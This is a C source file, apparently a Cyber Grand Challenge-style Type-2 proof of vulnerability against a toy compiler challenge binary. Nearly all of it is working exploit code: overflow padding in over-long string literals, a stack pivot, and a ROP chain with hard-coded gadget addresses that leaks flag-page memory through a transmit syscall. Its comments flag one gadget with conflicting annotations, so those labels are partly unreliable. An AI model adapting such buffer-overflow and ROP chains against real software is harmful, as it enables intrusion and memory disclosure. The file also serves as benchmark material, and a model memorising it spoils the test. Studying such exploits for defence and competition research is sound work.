LEGIT_00006 pov
#include <pov.h>
#include <stdio.h>
/*
 * Filler dword for the payload slots that only need to be occupied.
 *
 * Returns the fixed value 0x41414141 ("AAAA"). An earlier variant assembled
 * the dword from four bytes obtained through a three-argument random()
 * helper, each forced into 0x80..0xff; that path is disabled, so the value
 * is constant and the generated payload is reproducible across runs.
 */
unsigned int getrand(void) {
    const unsigned int filler = 0x41414141u; /* "AAAA" */
    return filler;
}
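/*
 * Type-2 PoV for LEGIT_00006.
 *
 * The target accepts a tiny C-like source ("void func1 () { ... }") and
 * processes it on ">>COMPILE". This PoV feeds it four over-long string
 * literals: two of filler, a data payload (`payload`) and a fourth literal
 * that starts with a two-dword table and carries a ROP chain (`payload2`).
 * The chain is built to transmit TYPE2_LENGTH bytes starting at
 * TYPE2_ADDR + 0x28 back to us; those bytes are handed to type2_submit().
 *
 * Every address below is hard-coded against one specific build of the
 * target (gadgets in 0x0804xxxx..0x080cxxxx, payload/stack locations at
 * 0xb7fd.../0xb7ff...); no randomization is assumed and nothing here
 * derives an address at run time. The gadget annotations are the original
 * author's and were not re-verified: note that 0x0806f885 is annotated
 * both as "pop esi ; ret" and as "pop ecx ; ret" below -- at least one of
 * the two is wrong, so confirm which register it really loads before
 * relying on ecx or esi being set.
 *
 * Returns 0 after the leaked bytes were submitted, or -1 (nothing is sent
 * to the target) if the ROP chain no longer fits its fixed 0x31c-byte slot.
 */
int exploit1(void)
{
    type2_init();

    /* Address at which the data payload (third literal) is expected to sit
     * in the target. Fixed constant; confirm against the target build. */
    unsigned int payload_addr = 0xb7fff073;

    /* Two-dword table placed at the very start of the fourth literal: a
     * pointer four bytes into the payload, and a "retn 0x0BEB" gadget (pops
     * a return address, then lifts esp by 0x0BEB -- this looks like the
     * stack pivot into the region holding payload2; confirm against the
     * binary). */
    buf_t *dummy_table = buf_new();
    buf_p32(dummy_table, payload_addr + 4);
    buf_p32(dummy_table, 0x080545b7); // retn 0x0BEB

    /* Two small negative dwords written into fixed payload slots; what the
     * target reads them as is not documented in this file. */
    int A = -48;
    int B = -31;

    /* Shift the flag-page address supplied by pov.h by 0x28. This mutates
     * the global: the ecx halves in payload2 use the adjusted value, and a
     * second call to exploit1() in the same process would shift it again. */
    TYPE2_ADDR += 0x28;

    /*
     * Data payload: 28 dwords = 0x70 bytes. getrand() returns 0x41414141,
     * so the "| 1" is currently a no-op (0x41 is already odd); it only
     * matters for the disabled random variant of getrand(). The non-filler
     * slots (two negative dwords, three 0x080cxxxx data addresses, A, B,
     * 0xffffffff, payload_addr and a 0xb7fd... pointer) are positional --
     * do not reorder or insert entries.
     */
    buf_t *payload = buf_new();
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, 0xfffffff1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, 0xffffffe1);
    buf_p32(payload, 0x080c0481);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, A);
    buf_p32(payload, B);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, 0x80c0b11);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, 0x80c0b31);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, getrand() | 1);
    buf_p32(payload, 0xffffffff);
    buf_p32(payload, payload_addr);
    buf_p32(payload, 0xb7fdb0a0 - 8);

    /*
     * ROP chain. Under DECREE's syscall numbering (2 = transmit,
     * 1 = _terminate) this reads as
     *     transmit(ebx = 1, ecx = TYPE2_ADDR, edx = TYPE2_LENGTH, esi = 0x080c0b31)
     *     _terminate(ebx = 0)
     * Several constants are split or computed so that no dword contains a
     * byte the target's string parser would choke on (presumably NUL or a
     * double quote):
     *   - ecx is assembled as TYPE2_ADDR/2 + (TYPE2_ADDR - TYPE2_ADDR/2),
     *     which equals TYPE2_ADDR exactly under integer division;
     *   - eax = 1 is assembled as 0xf7f3f111 + 0x080C0EF0, which wraps to 1;
     *   - edx = TYPE2_LENGTH is counted up with one "inc eax" per byte.
     */
    buf_t *payload2 = buf_new();
    buf_p32(payload2, 0x0806f885); // pop esi ; ret   (same address is labelled "pop ecx" below)
    buf_p32(payload2, 0x080c0b31);
    buf_p32(payload2, 0x0806859e); // pop eax ; ret
    buf_p32(payload2, TYPE2_ADDR / 2);
    buf_p32(payload2, 0x0806f885); // pop ecx ; ret   (same address is labelled "pop esi" above)
    buf_p32(payload2, TYPE2_ADDR - TYPE2_ADDR / 2);
    buf_p32(payload2, 0x08049907); // add ecx, eax; destroy eax; add esp, 4; pop ebp ; ret
    buf_append_rand_pad(payload2, 'A', 'A', 4); // consumed by "add esp, 4"
    buf_append_rand_pad(payload2, 'A', 'A', 4); // consumed by "pop ebp"
    buf_p32(payload2, 0x0806859e); // pop eax ; ret
    buf_p32(payload2, 0xf7f3f111); // 0xf7f3f111 + 0x080C0EF0 = 1 (mod 2^32)
    buf_p32(payload2, 0x0809c034); // add eax, 0x080C0EF0 ; pop ebp ; ret ;
    buf_append_rand_pad(payload2, 'A', 'A', 4); // consumed by "pop ebp"
    buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret   -> ebx = 1
    buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
    for (int i = 0; i < TYPE2_LENGTH; i++) {
        buf_p32(payload2, 0x08058c09); // inc eax ; ret
    }
    buf_p32(payload2, 0x08087041); // xchg eax, edx ; ret   -> edx = TYPE2_LENGTH
    buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
    buf_p32(payload2, 0x08058c09); // inc eax ; ret
    buf_p32(payload2, 0x08058c09); // inc eax ; ret         -> eax = 2
    buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret
    buf_append_rand_pad(payload2, 'A', 'A', 4); // consumed by "pop ecx"
    buf_append_rand_pad(payload2, 'A', 'A', 4); // consumed by "pop ebx"
    buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
    buf_p32(payload2, 0x08098f0e); // xchg eax, ebx ; ret   -> ebx = 0
    buf_p32(payload2, 0x0809c11a); // xor eax, eax ; ret
    buf_p32(payload2, 0x08058c09); // inc eax ; ret         -> eax = 1
    buf_p32(payload2, 0x0809c0e3); // int 0x80 ; pop ecx ; pop ebx ; ret

    /* payload2 is padded into a fixed 0x31c-byte slot below. If the chain
     * ever outgrows that slot the pad count would wrap and the fourth
     * literal would change size, so refuse to talk to the target at all. */
    if (payload2->len > 0x31c) {
        buf_delete(payload2);
        buf_delete(payload);
        buf_delete(dummy_table);
        return -1;
    }

    sendline("void func1 () {");

    /* Line 1 of the function body: 956 filler bytes and a ';'. With lo == hi
     * buf_append_rand_pad presumably emits exactly that many 'A's. */
    buf_t *tmp = buf_new();
    buf_append(tmp, " ");
    buf_append_rand_pad(tmp, 'A', 'A', 956);
    buf_append(tmp, ";\n");
    sendb(tmp);
    buf_delete(tmp);

    /* Line 2: a 256-byte string literal of filler. */
    tmp = buf_new();
    buf_append(tmp, " \"");
    buf_append_rand_pad(tmp, 'A', 'A', 256);
    buf_append(tmp, "\";\n");
    sendb(tmp);
    buf_delete(tmp);

    /* Line 3: another 256-byte literal (0x28 + 0x70 + 0x68 = 0x100) carrying
     * the data payload at offset 0x28. buf_appendb_del consumes payload. */
    tmp = buf_new();
    buf_append(tmp, " \"");
    buf_append_rand_pad(tmp, 'A', 'A', 0x28);
    buf_appendb_del(tmp, payload);
    buf_append_rand_pad(tmp, 'A', 'A', 0x68);
    buf_append(tmp, "\";\n");
    sendb(tmp);
    buf_delete(tmp);

    /* Line 4: a 0x500-byte literal (8 + 0x1dc + 0x31c): the pivot table
     * first, the ROP chain at offset 0x1e4. payload2 is appended with the
     * non-deleting variant because its length is still needed for the pad,
     * so it is freed explicitly afterwards. */
    tmp = buf_new();
    buf_append(tmp, " \"");
    buf_appendb_del(tmp, dummy_table);
    buf_append_rand_pad(tmp, 'A', 'A', 0x1dc);
    buf_appendb(tmp, payload2);
    buf_append_rand_pad(tmp, 'A', 'A', 0x31c - payload2->len);
    buf_delete(payload2);
    buf_append(tmp, "\";\n");
    sendb(tmp);
    buf_delete(tmp);

    sendline("}\n");
    sendline(">>COMPILE");

    /* Skip the target's output up to and including "line 2.\n" (presumably a
     * diagnostic about the second source line); the bytes that follow are
     * taken as the leaked flag-page contents. recvn's return value is passed
     * straight through -- its failure behaviour is not visible here. */
    skipuntil("line 2.\n");
    type2_submit((const unsigned char *)recvn(TYPE2_LENGTH), TYPE2_LENGTH);
    return 0;
}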
/* Entry point: run the single PoV attempt. Its result is deliberately not
 * propagated; the process always exits with status 0. */
int main(void)
{
    (void)exploit1();
    return 0;
}